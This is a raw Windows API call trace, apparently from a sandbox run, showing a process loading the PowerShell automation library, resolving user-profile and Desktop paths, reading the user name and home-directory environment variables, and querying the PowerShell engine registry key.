lpFileName="C:\\Users\\aDU0VK IWA5kLS\\Desktop", nBufferLength=0x105, lpBuffer=0xccec0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS\\Desktop", lpFilePart=0x0) returned 0x1f [0136.436] SetErrorMode (uMode=0x1) returned 0x1 [0136.436] GetFileAttributesExW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\Desktop" (normalized: "c:\\users\\adu0vk iwa5kls\\desktop"), fInfoLevelId=0x0, lpFileInformation=0xcd0d0 | out: lpFileInformation=0xcd0d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xf09fade0, ftCreationTime.dwHighDateTime=0x1d2ec02, ftLastAccessTime.dwLowDateTime=0x1dbe3ff0, ftLastAccessTime.dwHighDateTime=0x1d4406f, ftLastWriteTime.dwLowDateTime=0x1dbe3ff0, ftLastWriteTime.dwHighDateTime=0x1d4406f, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0136.436] SetErrorMode (uMode=0x1) returned 0x1 [0136.436] GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\Desktop", nBufferLength=0x105, lpBuffer=0xcced0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aDU0VK 
IWA5kLS\\Desktop", lpFilePart=0x0) returned 0x1f [0136.436] GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\Desktop\\.", nBufferLength=0x105, lpBuffer=0xccdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS\\Desktop", lpFilePart=0x0) returned 0x1f [0136.437] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0xccf00, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0136.437] SetErrorMode (uMode=0x1) returned 0x1 [0136.437] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0xcd110 | out: lpFileInformation=0xcd110*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf068ee40, ftLastAccessTime.dwHighDateTime=0x1d2ec02, ftLastWriteTime.dwLowDateTime=0xf068ee40, ftLastWriteTime.dwHighDateTime=0x1d2ec02, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0136.437] SetErrorMode (uMode=0x1) returned 0x1 [0136.437] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0xccf00, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0136.437] SetErrorMode (uMode=0x1) returned 0x1 [0136.437] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0xcd110 | out: lpFileInformation=0xcd110*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf068ee40, ftLastAccessTime.dwHighDateTime=0x1d2ec02, ftLastWriteTime.dwLowDateTime=0xf068ee40, ftLastWriteTime.dwHighDateTime=0x1d2ec02, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0136.437] SetErrorMode (uMode=0x1) returned 0x1 [0136.438] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0xccf10, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0136.438] GetFullPathNameW (in: 
lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0xcce00, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0136.438] GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS", nBufferLength=0x105, lpBuffer=0xccf00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS", lpFilePart=0x0) returned 0x17 [0136.438] SetErrorMode (uMode=0x1) returned 0x1 [0136.438] GetFileAttributesExW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS" (normalized: "c:\\users\\adu0vk iwa5kls"), fInfoLevelId=0x0, lpFileInformation=0xcd110 | out: lpFileInformation=0xcd110*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf068ee40, ftCreationTime.dwHighDateTime=0x1d2ec02, ftLastAccessTime.dwLowDateTime=0xf0dd91a0, ftLastAccessTime.dwHighDateTime=0x1d2ec02, ftLastWriteTime.dwLowDateTime=0xf0dd91a0, ftLastWriteTime.dwHighDateTime=0x1d2ec02, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0136.438] SetErrorMode (uMode=0x1) returned 0x1 [0136.438] GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS", nBufferLength=0x105, lpBuffer=0xccf00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS", lpFilePart=0x0) returned 0x17 [0136.438] SetErrorMode (uMode=0x1) returned 0x1 [0136.438] GetFileAttributesExW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS" (normalized: "c:\\users\\adu0vk iwa5kls"), fInfoLevelId=0x0, lpFileInformation=0xcd110 | out: lpFileInformation=0xcd110*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf068ee40, ftCreationTime.dwHighDateTime=0x1d2ec02, ftLastAccessTime.dwLowDateTime=0xf0dd91a0, ftLastAccessTime.dwHighDateTime=0x1d2ec02, ftLastWriteTime.dwLowDateTime=0xf0dd91a0, ftLastWriteTime.dwHighDateTime=0x1d2ec02, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0136.439] SetErrorMode (uMode=0x1) returned 0x1 [0136.439] GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS", nBufferLength=0x105, lpBuffer=0xccf10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS", lpFilePart=0x0) returned 0x17 [0136.439] 
GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\.", nBufferLength=0x105, lpBuffer=0xcce00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS", lpFilePart=0x0) returned 0x17 [0136.439] GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\Desktop", nBufferLength=0x105, lpBuffer=0xccf00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS\\Desktop", lpFilePart=0x0) returned 0x1f [0136.439] SetErrorMode (uMode=0x1) returned 0x1 [0136.439] GetFileAttributesExW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\Desktop" (normalized: "c:\\users\\adu0vk iwa5kls\\desktop"), fInfoLevelId=0x0, lpFileInformation=0xcd110 | out: lpFileInformation=0xcd110*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xf09fade0, ftCreationTime.dwHighDateTime=0x1d2ec02, ftLastAccessTime.dwLowDateTime=0x1dbe3ff0, ftLastAccessTime.dwHighDateTime=0x1d4406f, ftLastWriteTime.dwLowDateTime=0x1dbe3ff0, ftLastWriteTime.dwHighDateTime=0x1d4406f, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0136.439] SetErrorMode (uMode=0x1) returned 0x1 [0136.439] GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\Desktop", nBufferLength=0x105, lpBuffer=0xccf00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS\\Desktop", lpFilePart=0x0) returned 0x1f [0136.439] SetErrorMode (uMode=0x1) returned 0x1 [0136.440] GetFileAttributesExW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\Desktop" (normalized: "c:\\users\\adu0vk iwa5kls\\desktop"), fInfoLevelId=0x0, lpFileInformation=0xcd110 | out: lpFileInformation=0xcd110*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xf09fade0, ftCreationTime.dwHighDateTime=0x1d2ec02, ftLastAccessTime.dwLowDateTime=0x1dbe3ff0, ftLastAccessTime.dwHighDateTime=0x1d4406f, ftLastWriteTime.dwLowDateTime=0x1dbe3ff0, ftLastWriteTime.dwHighDateTime=0x1d4406f, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0136.440] SetErrorMode (uMode=0x1) returned 0x1 [0136.440] GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\Desktop", 
nBufferLength=0x105, lpBuffer=0xccf10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS\\Desktop", lpFilePart=0x0) returned 0x1f [0136.440] GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\Desktop\\.", nBufferLength=0x105, lpBuffer=0xcce00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS\\Desktop", lpFilePart=0x0) returned 0x1f [0136.443] GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\Desktop", nBufferLength=0x105, lpBuffer=0xcd170, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS\\Desktop", lpFilePart=0x0) returned 0x1f [0136.443] SetErrorMode (uMode=0x1) returned 0x1 [0136.443] GetFileAttributesExW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\Desktop" (normalized: "c:\\users\\adu0vk iwa5kls\\desktop"), fInfoLevelId=0x0, lpFileInformation=0xcd3d0 | out: lpFileInformation=0xcd3d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xf09fade0, ftCreationTime.dwHighDateTime=0x1d2ec02, ftLastAccessTime.dwLowDateTime=0x1dbe3ff0, ftLastAccessTime.dwHighDateTime=0x1d4406f, ftLastWriteTime.dwLowDateTime=0x1dbe3ff0, ftLastWriteTime.dwHighDateTime=0x1d4406f, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0136.443] SetErrorMode (uMode=0x1) returned 0x1 [0136.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.445] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) 
returned 0x74 [0136.445] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.445] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.487] CoTaskMemAlloc (cb=0x804) returned 0x1b825410 [0136.487] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b825410, nSize=0xcd738 | out: lpNameBuffer="AUFDDCNTXWT\\aDU0VK IWA5kLS", nSize=0xcd738) returned 0x1 [0136.487] CoTaskMemFree (pv=0x1b825410) [0136.487] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.487] GetUserNameW (in: lpBuffer=0x14d180, pcbBuffer=0xcd778 | out: lpBuffer="aDU0VK IWA5kLS", pcbBuffer=0xcd778) returned 1 [0136.488] CoTaskMemFree (pv=0x14d180) [0136.489] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x36ee2f8*="Available", lpRawData=0x36ee088) returned 1 [0136.490] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0136.490] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0136.490] CoTaskMemFree (pv=0x10c990) [0136.491] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0136.491] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0136.491] CoTaskMemFree (pv=0x10c990) [0136.705] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.706] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.706] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.712] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.712] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.713] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.713] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0136.713] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="C:") returned 0x2 [0136.713] CoTaskMemFree (pv=0x10c990) [0136.713] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0136.713] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="\\Users\\aDU0VK IWA5kLS") returned 0x15 [0136.713] CoTaskMemFree (pv=0x10c990) [0136.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) 
returned 0x74 [0136.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 
[0136.716] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.716] GetCurrentProcessId () returned 0xbf8 [0136.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", 
lpFilePart=0x0) returned 0x74 [0136.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) 
returned 0x74 [0136.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.720] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd758 | out: phkResult=0xcd758*=0x38c) returned 0x0 [0136.720] RegQueryValueExW (in: hKey=0x38c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd6dc, lpData=0x0, lpcbData=0xcd6d8*=0x0 | out: lpType=0xcd6dc*=0x1, lpData=0x0, lpcbData=0xcd6d8*=0x56) returned 0x0 [0136.720] CoTaskMemAlloc (cb=0x5a) returned 0x1b80add0 [0136.720] RegQueryValueExW (in: hKey=0x38c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd6ac, lpData=0x1b80add0, lpcbData=0xcd6a8*=0x56 | out: lpType=0xcd6ac*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd6a8*=0x56) returned 0x0 [0136.720] CoTaskMemFree 
(pv=0x1b80add0) [0136.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.721] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.721] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.721] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 
